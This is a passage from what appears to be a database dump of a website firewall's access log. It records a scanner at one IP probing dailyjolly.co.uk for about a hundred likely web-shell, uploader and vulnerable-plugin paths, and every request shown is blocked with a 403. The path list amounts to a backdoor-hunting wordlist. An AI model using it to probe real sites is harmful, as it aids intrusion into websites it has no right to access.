\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/z88x\\/0z.php\"}','G3We0OmStNZHLvX7jdwcru4I',0,1674344551.6273,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/add_modal.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/add_modal.php\"}','CXPda56AYVNjKzg91liIfRtk',0,1674344551.9872,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/adminedit.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/adminedit.php\"}','aGkSCyjfKBXcQLeJn4zgPE1i',0,1674344552.3126,217,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/editProject.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/editProject.php\"}','WdmwNvi0FC8yU6rM1uzJ7IO9',0,1674344552.6864,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/index_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/index_upload.php\"}','6SkxQ1y8E0Le4MRhqJrbNIvB',0,1674344553.0272,232,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/reg_referencia.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/reg_referencia.php\"}','98cTuz2VxCEhA4dPFU1BoZ3k',0,1674344553.4286,236,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/bak/UploadPic.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/bak\\/UploadPic.php\"}','cqNpKhdCRvuL7e2AJygfQPWT',0,1674344553.8346,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/editor/assetmanager/assetmanager.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/editor\\/assetmanager\\/assetmanager.php\"}','tzN6VOklpPJmsCr2wjITZqG4',0,1674344554.1608,216,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/css/ENKI.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/css\\/ENKI.php\"}','ZiFoEB7Cpu1XyljRc38bnQzV',0,1674344554.5379,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/filemanager/dialog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/filemanager\\/dialog.php\"}','jTQD0lEb4umr9eCnKPvaMzOh',0,1674344554.9122,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/images/images.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/images\\/images.php\"}','Sjre28KLBF7qNTPHJCRxiwMW',0,1674344555.2879,189,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/auto1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/auto1.php\"}','a9fAOHGdgsVw3hDmuB4p7kFy',0,1674344555.6478,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/ban.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/ban.php\"}','FskGA1MXabJ3qReztOBfnoSc',0,1674344555.9875,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/cons.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/cons.php\"}','HaM0hVjQoTWLxZiblq2P97N3',0,1674344556.3165,229,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/galeria.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/galeria.php\"}','FXe5OWnwtP4dHj3yhAfCSQKk',0,1674344556.6952,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/upload.php\"}','NsMdkDf1wBZveplTELt7aqb2',0,1674344557.0118,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/1U.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/1U.php\"}','qYOrARiZhcf6GDsoygEtk0H3',0,1674344557.3759,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/css.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/css.php\"}','iqQhZ0jrFP63K7fz5GIpeRtJ',0,1674344557.6967,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/domat.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/domat.php\"}','Um6BXJGcvKsVRrDY7kjfno2g',0,1674344558.0221,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/eee.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/eee.php\"}','lFceRsBjKX13ODQr8Uf5SbEd',0,1674344558.3612,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/ET0O.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/ET0O.php\"}','JByxUgdsZeqFoIR8jD9haMC4',0,1674344558.7117,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/formulier.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/formulier.php\"}','rR0cKboOiCTvU5WJZDGXtP9j',0,1674344559.0395,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/h[1].php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/h%5b1%5d.php\"}','sUdBkpcRoPq6jQf2OCSGutHA',0,1674344559.3571,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/idpago.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/idpago.php\"}','yX6rb5dxtmGivksSWRBIYJ1H',0,1674344559.6726,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/images.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/images.php\"}','TbVDIKNxOHBt2ihuWJzYc4yj',0,1674344560.0108,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/imagrer.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/imagrer.php\"}','17DUY5GaOCXo0jtFmQSAvJ98',0,1674344560.3530,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/inbox.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/inbox.php\"}','ekpOrS09uh2FcUd8qHijGM5P',0,1674344560.7258,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/include.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/include.php\"}','ybM3ZCfHzBQRwaS6O2dciV5E',0,1674344561.0575,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/index.blade.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/index.blade.php\"}','fi1rEFRpU5kxsqWMjmhdZACN',0,1674344561.3713,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/index2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/index2.php\"}','7eMOYKwiD0tT2ZbaX69jnxB4',0,1674344561.7035,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/iupload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/iupload.php\"}','XjyfN5YMl4zJnehISDq39o1s',0,1674344562.0480,269,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/Logo_mm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/Logo_mm.php\"}','hkHabgFSTi0u16lUeG4xV5Ep',0,1674344562.4846,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/m.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/m.php\"}','CUWYrjgbI1Bw2cF7QpiHLN6n',0,1674344562.8449,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/Marvins.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/Marvins.php\"}','kcoQpPLB3sHt1OVf0RnNb7MC',0,1674344563.2091,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/membernew.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/membernew.php\"}','cNC4jDGBwFsh6A0QRElyYiom',0,1674344563.8573,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/ms-add-pro-photo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/ms-add-pro-photo.php\"}','gFy3EodnKlSQhiWJV7ajx1f9',0,1674344564.1887,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/newa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/newa.php\"}','nHCgkaGmsqMoSWhNv18c50Qf',0,1674344564.5840,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/phpimage.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/phpimage.php\"}','I5kQrSbBxMpJ7W2XDnHCR8la',0,1674344564.9250,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/pluginfotos.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/pluginfotos.php\"}','iTVDkZjuJgB7xIP6dvFyqcsf',0,1674344565.2748,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/productos_img_edit.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/productos_img_edit.php\"}','4vi6PfyKUH8S5OqmCzl7GtgB',0,1674344565.6215,268,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/reg_form.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/reg_form.php\"}','SJpLxMaGCiDrqZ1IRsyfwY8b',0,1674344566.0887,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sagafif.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sagafif.php\"}','XIcmbuKSfg52dy6VjUlxA1Ya',0,1674344566.4677,294,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sendme.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sendme.php\"}','MokZbWYSEFRtGfpQ1UBzOlv0',0,1674344566.9305,264,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sfm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sfm.php\"}','B8UbgFja6fEGS1V2N0IYprcL',0,1674344567.3527,212,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/test_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/test_upload.php\"}','3NB7Kh4dZLCeug0qSk6x1HtO',0,1674344567.7129,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/unzip.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/unzip.php\"}','s8ChJeZbxcL1oMfAYF42KRGI',0,1674344568.0566,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/up.pdf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/up.pdf.php\"}','DY4zHdSv7xEtBiJ6fyMAOkwn',0,1674344568.3881,189,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/upload_submition.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/upload_submition.php\"}','JK39AnHQXErtL7ePGblFdjcT',0,1674344568.7537,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/uu_file_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/uu_file_upload.php\"}','3BeRKx0oHpEvGzADlnYJfVtZ',0,1674344569.0980,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/add-actualites.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/add-actualites.php\"}','0RPgV6XYremAcvJNQId4GM5B',0,1674344569.4326,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/alumini/9227_a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/alumini\\/9227_a.php\"}','IWnG41cYuhStrPZv6X3LTO0E',0,1674344569.7512,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/headers/readme.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/headers\\/readme.php\"}','Cn6qUhIp13e9VTGoJKARzuxE',0,1674344570.1168,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/images.phtml','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/images.phtml\"}','qvZmNa6i9z1ewjYdEMc0DFCg',0,1674344570.4553,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/addProduct.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/addProduct.php\"}','UbzsXLnfE0Z1cWMmu8hKwHvR',0,1674344570.7691,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/dir.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/dir.php\"}','cew5y0b3EuKRNMpnj4WktqTI',0,1674344571.0916,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/fud1.php.jpg','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/fud1.php.jpg\"}','tvDau7fcyxd43U2wsYn5WBFm',0,1674344571.4162,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/upload.php\"}','xG0EUvuSjAoK7NbDPYstcqe1',0,1674344571.7392,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/vvvindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/vvvindex.php\"}','ONG43iRYpBgFe7Tztr8W1XEc',0,1674344572.0720,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/file/zup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/file\\/zup.php\"}','sjPcAFKvmua8OZMEn6SkVGdI',0,1674344572.4120,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/petit/fm.php.gif','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/petit\\/fm.php.gif\"}','BJhTKOGjR6ZvLCi5lmk72aVb',0,1674344572.7469,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/project/prv.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/project\\/prv.php\"}','qYtBHp2WK7MjilyC1FXQw3xA',0,1674344573.1151,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/as.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/as.php\"}','5WqRuJr41BlkO2AKTDgZcyH0',0,1674344573.4485,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/shell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/shell.php\"}','ojZdUJigGvFxQa1IODEPbfrp',0,1674344573.7734,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/z7.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/z7.php\"}','SytKQpZLn9bAU1aTuhzg0wf4',0,1674344574.1008,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/module.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/\\/module.php\"}','LFD9z8WUiy7ae0JZOT5HsYxj',0,1674344574.4378,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/a.php\"}','WNcaRSb4tUKd9uPjgJn3Z7F2',0,1674344574.7635,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/AronTn.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/AronTn.php\"}','pk9SOvN8YtXRI71x3onJeU2q',0,1674344575.1021,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/core.php\"}','jf20XtJKe8BG5uSnspIT4dvM',0,1674344575.4228,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/languages/admin-network-ru_RU.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/languages\\/admin-network-ru_RU.php\"}','ylP4ABDdFrvTUxSON6sLG7mz',0,1674344575.7396,201,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/clientprofile/mediagallery.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/clientprofile\\/mediagallery.php\"}','VZTy9hC2btpRYNsMkg3POqB5',0,1674344576.1067,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/db-toolkit/dbtoolkit_import.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/db-toolkit\\/dbtoolkit_import.php\"}','jJBm0bGutDk4fWQl8i1UM7sx',0,1674344576.4400,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/errynclkzk/dadwehyzpf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/errynclkzk\\/dadwehyzpf.php\"}','qQKFTd57EkgwJiZHI8nBCUMv',0,1674344576.7655,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/hello-dolly/install.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/hello-dolly\\/install.php\"}','kamWTMu0EBR1HOtX2je3yxGF',0,1674344577.0886,194,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-symetrio/schedule-symetrio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/wp-symetrio\\/schedule-symetrio.php\"}','AWF9Y8NT1LUD0wrJyejXOZz7',0,1674344577.4522,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/themes/intigo-child/ptm-import.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/intigo-child\\/ptm-import.php\"}','ow7mBjvIDbaLFHZd0MAPn6xC',0,1674344577.8192,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/mc4wp-debug-log.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/\\/wp-content\\/uploads\\/mc4wp-debug-log.php\"}','SZHY4CpaUuzMWfmAiThgqxVR',0,1674344578.1563,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2012/str_pad.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2012\\/str_pad.php\"}','bTfOPLwAIXM59uWxnKR7NdUZ',0,1674344578.4932,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2016\\/wp-signup.php\"}','6K82ZiMsPGvQANwutjcTEVa7',0,1674344578.8241,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2018/wp-conflg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2018\\/wp-conflg.php\"}','aFkfPWrADHu8cNtKXbIzwRJm',0,1674344579.1811,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2021\\/wp-signup.php\"}','SvzJ5LcUZCkDya9tVG8pfWFq',0,1674344579.5465,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/1wiki.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/1wiki.php\"}','IyJnwxG3V1AeYk8utg7Wdzrh',0,1674344579.8994,262,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/checkbox.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/checkbox.php\"}','ak1m8iUgTJvpEfl20jLexN6Y',0,1674344580.3185,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/data-user.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/data-user.php\"}','rszp8X6TKaqkS345ocfDNUhY',0,1674344580.6824,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/wp-conflg.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/wp-conflg.php.suspected\"}','7HjTuGZQWX3pUIYxcr4C5ywt',0,1674344581.0325,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/3ponu.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/3ponu.php\"}','s26NSLVE5F